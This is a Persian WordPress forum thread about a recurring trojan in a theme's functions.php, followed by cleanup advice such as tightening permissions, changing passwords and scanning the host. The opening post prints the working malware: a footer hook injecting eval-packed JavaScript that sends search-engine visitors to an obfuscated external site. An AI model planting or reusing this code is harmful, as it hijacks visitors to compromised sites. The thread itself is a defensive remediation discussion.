eskafild

تروجان

48 پست در این موضوع قرار دارد

سلام یه تروجان افتاده تو قالبم هی می پاکم بر میگرده چه کنم؟ورژن وردپرس رو هم ارتقاع دادم فایده نداد

<?php
add_action('get_footer', 'add_sscounter');
function add_sscounter(){
echo '<!--scounter-->';
if(function_exists('is_user_logged_in')){
if(time()%2 == 0 && !is_user_logged_in()){
echo "<script language=\"JavaScript\">eval(function(p,a,c,k,e,r){e=function©{return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e©]=k[c]||e©;k=[function(e){return r[e]}];e=function(){return'\\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\\b'+e©+'\\\b','g'),k[c]);return p}('e r=x.9,t=\"\",q;4(r.3(\"m.\")!=-1)t=\"q\";4(r.3(\"7.\")!=-1)t=\"q\";4(r.3(\"8.\")!=-1)t=\"p\";4(r.3(\"a.\")!=-1)t=\"q\";4(r.3(\"f.\")!=-1)t=\"g\";4(r.3(\"j.\")!=-1)t=\"q\";4(t.6&&((q=r.3(\"?\"+t+\"=\"))!=-1||(q=r.3(\"&\"+t+\"=\"))!=-1))B.C=\"v\"+\"w\"+\":/\"+\"/A\"+\"b\"+\"k\"+\"5\"+\"h.\"+\"c\"+\"z/s\"+\"u\"+\"5\"+\"h.p\"+\"d?\"+\"t\"+\"y=1&t\"+\"i\"+\"l=\"+r.n(q+2+t.6).o(\"&\")[0];',39,39,'|||indexOf|if|rc|length|msn|yahoo|referrer|altavista|ogo|bi|hp|var|aol|query||er|ask|sea|ms|google|substring|split||||||ea|ht|tp|document|||go|window|location'.split('|'),0,{}))</script>";

1

به اشتراک گذاری این پست


لینک به پست

سلام دوست عزیز

احتمالا شل آپلود شده تو سایتتون. میتونین از مسئول هاستتون درخواست کنین در صورت امکان چک و فایل مخرب رو پیدا کنن. افزونه‌ی Threat Scan هم ممکنه مورد رو تشخیص بده.

حتما فایل wp-config.php رو به یک پوشه بالاتر از سطحی که وردپرس نصب شده منتقل کنین و پرمیژنش رو ۴۰۰ یا ۴۴۰ قرار بدین.

6

به اشتراک گذاری این پست


لینک به پست

در تکمیل حرف محسن عزیز

این یک redirector هست و تنها مشکلی که ایجاد میکنه استاپ شدن صفحه توسط آنتی ویروسهاست.

تغییر سطح دسترسی فایل wp-config.php بهترین گزینه خواهد بود.

6

به اشتراک گذاری این پست


لینک به پست

ببخشیدا این کد رو من از(functions.php) پیدا کردم این رو حذف کردنی دیگه ویروس کش خطا نمیدخ]ولی یه مدت دیگه دوباره بر می گرده

2

به اشتراک گذاری این پست


لینک به پست

هنوز راه نفوذ این تروجان به functions.php پوسته کاملا مشخص نشده.

تااونجایی که بررسی کردم، این کد به صورت خوکار از plugin-editor.php و theme-editor.php نفوذ میکند!

برای رفع همین مشکل، میتونید موقت از این افزونه webstudio استفاده کنید و در صفحه تنظیمات، ویرایشگر کدها را غیرفعال کنید.

فکر کنم یکی از افزونه های محبوب وردپرس، باگ کوچکی داشته باشه که باعث این مشکل شده باشه. چون خیلی از سایت ها سریعا به این تروجان آلوده میشن و وردپرس هم حرفی از این تروجان نزده!

8

به اشتراک گذاری این پست


لینک به پست

در ادامه بحث

پرمیژن نوشتن را هم از فایل functions قالب بگیرید. => 400

5

به اشتراک گذاری این پست


لینک به پست

هنوز راه نفوذ این تروجان به functions.php پوسته کاملا مشخص نشده.

تااونجایی که بررسی کردم، این کد به صورت خوکار از plugin-editor.php و theme-editor.php نفوذ میکند!

برای رفع همین مشکل، میتونید موقت از این افزونه webstudio استفاده کنید و در صفحه تنظیمات، ویرایشگر کدها را غیرفعال کنید.

فکر کنم یکی از افزونه های محبوب وردپرس، باگ کوچکی داشته باشه که باعث این مشکل شده باشه. چون خیلی از سایت ها سریعا به این تروجان آلوده میشن و وردپرس هم حرفی از این تروجان نزده!

ممنون انجام دادم راستی تو گوگل سایتم رو سرچ کردم میگه:

این وبگاه ممکن است به رایانه شما آسیب وارد نماید.

http://support.google.com/websearch/bin/answer.py?hl=en&answer=45449

این چی بید؟

1

به اشتراک گذاری این پست


لینک به پست

سایت شما malware یا همون بدافزار هم داره.

در بخش google webmaster اکانت دارید؟

در اونجا محل بدافزار رو بهتون میگه.

2

به اشتراک گذاری این پست


لینک به پست

سایت شما malware یا همون بدافزار هم داره.

در بخش google webmaster اکانت دارید؟

در اونجا محل بدافزار رو بهتون میگه.

سلام

همین همین خطا رو هم برای وب سایت من رخ داده .

من از دوافزونه anti-malware و Expolit scanner استفاده کردم ، و افزونه ها رو حذف و دوباره نصب کردم و وردپرس رو هم بروز رسانی کردم.

الان ورودی گوگل افزایش یافته ولی هنوز این خطا از زیر وب سایتم پاک نشده ، حدود 8 روزه که من وردپرس رو بروز رسانی کرده ام.

This site may be compromised.

در گوگل وب مستر هم صفحات آلوده رو نشون داده.

من باید اون صفحه ها رو حذف کنم؟

1

به اشتراک گذاری این پست


لینک به پست

ممنون انجام دادم راستی تو گوگل سایتم رو سرچ کردم میگه:

این وبگاه ممکن است به رایانه شما آسیب وارد نماید.

http://support.googl...en&answer=45449

این چی بید؟

1. ابتدا کل سیستمتون رو با برنامه male ware byte اسکن کنید

2. پسورد FTP و Host رو تغییر بدین.

3. همانطور که مرتضی گفت، از گوگل وبمستر هم اقدام کنید.

فایرفاکس هم از دیتابیس گوگل برای تشخیص آلوده بودن سایت استفاده میکنه! سریعا باید اقدام کنید.

5

به اشتراک گذاری این پست


لینک به پست

سلام

همین همین خطا رو هم برای وب سایت من رخ داده .

من از دوافزونه anti-malware و Expolit scanner استفاده کردم ، و افزونه ها رو حذف و دوباره نصب کردم و وردپرس رو هم بروز رسانی کردم.

الان ورودی گوگل افزایش یافته ولی هنوز این خطا از زیر وب سایتم پاک نشده

This site may be compromised.

در گوگل وب مستر هم صفحات آلوده رو نشون داده.

من باید اون صفحه ها رو حذف کنم؟

سلام، شما هم میتونید این مراحل را طی کنید.

نیازی به حذف نیست!

البته این ویروس همیشه در دیتابیس جای میگیرد! یکسری کدمخرب هست و در بیشتر صفحات ظاهر میشود. دیتابیس را تعمیر و بهینه کنید مشکل رو حل میکند.

البته بعضی هاشون یک Table جداگونه برای این کار دارند D:

5

به اشتراک گذاری این پست


لینک به پست

ممنون انجام دادم راستی تو گوگل سایتم رو سرچ کردم میگه:

این وبگاه ممکن است به رایانه شما آسیب وارد نماید.

http://support.googl...en&answer=45449

این چی بید؟

به نظر من بهتره با پشتيباني هاست‌تون موضوع رو در ميان بزاريد ، اون‌ها با اسكنر‌هاي قوي خودشون هاست شما رو اسكن و از بد افزار خالي ميكنند ..

بعد اين هم طبق گفته‌ي آقا مصطفي عزيز تمامي پسورد‌ها رو عوض كنيد و مسائل امنيتي رو رعايت كنيد ..

5

به اشتراک گذاری این پست


لینک به پست

من همه ی کارهایی رو که گفتید انجام دادم

ولی هنوز گوگل همون خطا رو می ده و دیگه اینکه بعد از بروز رسانی وردپرس جفنگ زیاد نمی یومد . اما الان دوباره زیاد میاد

بیشتر مشکل هم تو افزونه exe-php که دارای تروجان هست. که یک افزونه بسیار کاربردی برای منه.

و تابع های eval() توی فایل های مختلف php وجود داره. که با Expolit scanner میزنم می گه که کدهای مخرب eval()

مثلا:wp-content/plugins/wp-jalali/inc/js/editjalali.js:1

eval(function(p,a,c,k,e,d){e=function©{return(c<a?

باید چطوری این تابع های خطرناک رو حذف کرد و از دوباره ایجاد شدن این تابع ها در وردپرس جلوگیری کرد؟

1

به اشتراک گذاری این پست


لینک به پست

احتمال زیاد مشکل از سمت سرور شماست که آلوده شده.

اگر از سرور باشه شما خیلی نمیتونی کار خاصی انجام بدی و باید مدیر سرور پاکسازی انجام بده.

این کدی هم که دادین :

eval(function(p,a,c,k,e,d){e=function©{return(c<a?

تکه ایی از یک بدافزار هست. و اینطور که گوگل آلرت میده بصورت وسیع روی سرور شما پخش شده.

4

به اشتراک گذاری این پست


لینک به پست

با نظر مرتضی موافقم! شما نمیتونید دقیقا بررسی کنید و تک تک فایل هارا ببینید. با میزبانی خود تماس بگیرید و از ایشون بخواهید که کلمه eval را در تمام فایل های شما سرچ کنید و نتیجه را به شما بدهد.

به این نکنه هم توجه کنید که بعد از پاکسازی تروجان، کمی زمان میبرد تا وب گاه شما در دسترسی قرار گیرد :)

4

به اشتراک گذاری این پست


لینک به پست

ببخشید گوگل وب مستر که یه کد میده تو head بزنیم اون رو قسمت رو توی قالب پیدا نمی کنم، چطور فعالش کنم تو وب مستر؟

0

به اشتراک گذاری این پست


لینک به پست

ببخشید گوگل وب مستر که یه کد میده تو head بزنیم اون رو قسمت رو توی قالب پیدا نمی کنم، چطور فعالش کنم تو وب مستر؟

مربوط به چی هست؟!
1

به اشتراک گذاری این پست


لینک به پست

سلام به دوستان

با توجه به راهنمایی که کردید ، انجام دادم و الان اون خطا که در زیر وب سایتم در گوگل بود پاک شده و ورودی گوگل هم افزایش یافته

با تشکر فراوان از اساتید :lol:

1

به اشتراک گذاری این پست


لینک به پست

مربوط به چی هست؟!

کدی که قرار می دیم تو سایت تا با گوگل وب مستر ارتباط برقرار کنه!

شما از کدوم روش استفاده می کنید؟

0

به اشتراک گذاری این پست


لینک به پست

منظورتون کد آنالیزور گوگل هست؟

0

به اشتراک گذاری این پست


لینک به پست

بله کد وبمستر که می ده تو کدوم پوشه از کد ها باید گذاشت؟

0

به اشتراک گذاری این پست


لینک به پست

کد جاوااسکریپت هست.

باید در فایل header و قبلا از

</head>

قرار بدید.

یعنی داخل تگ head باشه.

0

به اشتراک گذاری این پست


لینک به پست

سلام

میشه یه نگاه هم به وبسایت من بندازید؟

Pichgooshti.com

اصلا نمیتونم واردش بشم. هم مرورگر و هم ویروسیاب گیر میدن.

وارد سی پنل هم که میشم، مرورگر گیر میده و اصلا وارد فایل منیجر سی پنل نمیتونم بشم. خیلی وقته اینجوره (تقریبا دیگه از وبسایت هیچی نمونده).

0

به اشتراک گذاری این پست


لینک به پست

سلام ، به انجمن خوش اومديد ..

دوست عزيز سايت شما داراي بد افزار هستش و اسپم شده ، من قبلا ديده بودم سايتتون رو خيلي وقته اينجوري هستش ، چرا هيچ اقدامي نكرديد تا الان ؟

با هاستتون كه دسترسي نداريد ؟ بهتره با پشتيباني سرورتون تماس بگيريد تا هاستتون رو اسكن كنند ، يا خيلي بهترش اينه كه به غير از wp-config و theme تمامي فايل‌هاي هاستتون رو پاك كنند كه حداقل از اين حالت خارج بشه ، و از نو وردپرس رو نصب و راه‌اندازي كنيد ..

2

به اشتراک گذاری این پست


لینک به پست

ارسال شده در (ویرایش شده)

سلام ، به انجمن خوش اومديد ..

دوست عزيز سايت شما داراي بد افزار هستش و اسپم شده ، من قبلا ديده بودم سايتتون رو خيلي وقته اينجوري هستش ، چرا هيچ اقدامي نكرديد تا الان ؟

با هاستتون كه دسترسي نداريد ؟ بهتره با پشتيباني سرورتون تماس بگيريد تا هاستتون رو اسكن كنند ، يا خيلي بهترش اينه كه به غير از wp-config و theme تمامي فايل‌هاي هاستتون رو پاك كنند كه حداقل از اين حالت خارج بشه ، و از نو وردپرس رو نصب و راه‌اندازي كنيد ..

ممنون

خب اصلا وقتش نبوده.

یعنی میفرمایید کل اطلاعاتش (یعنی بیش از 1000 تا پست) هم باید پاک بشه؟

ویرایش شده در توسط pichgooshti
0

به اشتراک گذاری این پست


لینک به پست

برای ارسال نظر یک حساب کاربری ایجاد کنید یا وارد حساب خود شوید

برای اینکه بتوانید نظر ارسال کنید نیاز دارید که کاربر سایت شوید

ایجاد یک حساب کاربری

برای حساب کاربری جدید در انجمن ما ثبت نام کنید. عضویت خیلی ساده است !


ثبت نام یک حساب کاربری جدید

ورود به حساب کاربری

دارای حساب کاربری هستید؟ از اینجا وارد شوید


ورود به حساب کاربری